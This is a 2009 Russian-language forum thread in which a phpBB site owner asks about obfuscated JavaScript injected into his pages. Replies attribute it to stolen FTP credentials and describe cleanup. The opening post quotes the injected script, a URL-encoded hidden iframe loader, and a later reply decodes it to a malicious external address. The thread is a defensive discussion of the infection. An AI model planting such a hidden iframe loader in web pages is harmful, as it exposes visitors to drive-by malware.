|
Вирус о_ООбсуждение темы Вирус о_О в разделе Кальянная, часть категории РАЗНОЕ; Не знал, в какой раздел запихнуть, поэтому сунул сюда. Долгое время форум на PHPBB нормально работал. А вот вчера ПХП начал выдавать ошибки, ... |
|
Опции темы |
23.01.2009, 09:49 | #1 |
|
Не знал, в какой раздел запихнуть, поэтому сунул сюда.
Долгое время форум на PHPBB нормально работал. А вот вчера ПХП начал выдавать ошибки, что не может установить хедеры, потому что они уже отправлены. И сразу начинает ругаться аваст: сетевой экран: заблокировано соединение с вредоносным сайтом *URL вредоносного сайта* Посмотрел код сгенерированной страницы, в начало откуда-то добавилось вот это: Код HTML:
<!-- o65 --><Script Language='Javascript'> <!-- document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%72%74%64%6D%6E%73%2E%6E%65%74%2F%70%61%72%75%73%2F%3F%74%3D%32%38%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66%72%61%6D%65%3E')); //--> </Script><!-- c65 --><!-- o65 --><Script Language='Javascript'> <!-- document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%72%74%64%6D%6E%73%2E%6E%65%74%2F%70%61%72%75%73%2F%3F%74%3D%32%38%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66%72%61%6D%65%3E')); //--> </Script><!-- c65 --> Из-за чего может быть такое? На всякий случай не даю ссылку на форум и вредоносный сайт. |
|
23.01.2009, 10:00 | #2 |
|
Ну, кто-то добыл пароль к твоему FTP и встроил код вируса. Найди, куда оно встроено и удали.
Могу найти и исправить за 1000 рублей. |
|
23.01.2009, 11:31 | #3 |
|
А пишет он кстати это:
Код:
<iframe src="http://rtdmns.net/parus/?t=28" width=1 height=1 style="visibility:hidden;position:absolute"></iframe> |
|
23.01.2009, 11:52 | #4 |
|
Scroll, сколько раз говорить не хранить пароли в ФТП-клиентах...
|
|
23.01.2009, 13:14 | #5 |
|
Да. Такое часто бывает.
|
|
23.01.2009, 15:59 | #6 |
|
Ваш вирус не актуален: 404 Not Found
|
|
23.01.2009, 16:02 | #7 |
|
У меня тоже такое было Но у меня только iframe прописал в индекс.php
1. убрал код айфрейма 2. Написал в свой хостинг 3. Написал в хостинг, хостящий сайт указанный в коде iframe, попросил разобраться. Там на меня положили - на этом все и закончилось ) |
|
26.01.2009, 11:01 | #8 |
|
Дураки учатся на своих ошибках. Теперь буду более осторожен.
Последний раз редактировалось kost; 26.01.2009 в 14:00.. |
|
30.01.2009, 01:34 | #9 |
|
Знакомая ситуация. Это ваш комп поймал троян, вот почитайте. Вредоносный код у вас, скорее всего во всех файлах index.php и index.html в самом низу перед тегом </html>, хотя может быть и внутри страницы, искать нужно.... Вычищайте код, меняйте пароли к фтп, ну и, конечно, вирус удаляйте. И, как сказано выше, не храните пароли в программах для фтп.
|
|
30.01.2009, 10:20 | #10 |
|
Да, почистил комп, поменял пароль на FTP, перестал хранить его в ftp-клиенте. Код был прописан во всех index.*, main.*, login.*. На некоторых страницах по 2 раза (обязательно внизу, иногда примерно в середине).
|
|
|
Похожие темы | ||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Вирус? | ddddd | Кальянная | 40 | 28.05.2010 10:51 |
Вирус или нет? | sokol666 | Кальянная | 19 | 31.12.2008 15:47 |
Вирус в сети.... | candy_man | Кальянная | 7 | 04.02.2004 08:37 |
Реклама на форуме
Условия размещения рекламы
Биржа ссылок
Заработай на сайте!
|